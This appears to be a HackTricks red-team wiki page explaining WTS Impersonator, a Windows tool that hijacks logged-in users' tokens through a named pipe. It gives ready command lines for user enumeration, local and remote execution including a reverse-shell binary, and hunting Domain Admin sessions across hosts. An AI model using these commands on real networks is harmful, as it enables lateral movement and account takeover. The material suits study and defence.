{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
The WTS Impersonator tool exploits the "\pipe\LSM_API_service" RPC Named pipe to stealthily enumerate logged-in users and hijack their tokens, bypassing traditional Token Impersonation techniques. This approach facilitates seamless lateral movements within networks. The innovation behind this technique is credited to Omri Baso, whose work is accessible on GitHub.
The tool operates through a sequence of API calls:
WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW
-
Enumerating Users: Local and remote user enumeration is possible with the tool, using commands for either scenario:
- Locally:
.\WTSImpersonator.exe -m enum
- Remotely, by specifying an IP address or hostname:
.\WTSImpersonator.exe -m enum -s 192.168.40.131
- Locally:
-
Executing Commands: The
exec
andexec-remote
modules require a Service context to function. Local execution simply needs the WTSImpersonator executable and a command:- Example for local command execution:
.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe
- PsExec64.exe can be used to gain a service context:
.\PsExec64.exe -accepteula -s cmd.exe
- Example for local command execution:
-
Remote Command Execution: Involves creating and installing a service remotely similar to PsExec.exe, allowing execution with appropriate permissions.
- Example of remote execution:
.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2
- Example of remote execution:
-
User Hunting Module: Targets specific users across multiple machines, executing code under their credentials. This is especially useful for targeting Domain Admins with local admin rights on several systems.
- Usage example:
.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe
- Usage example:
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.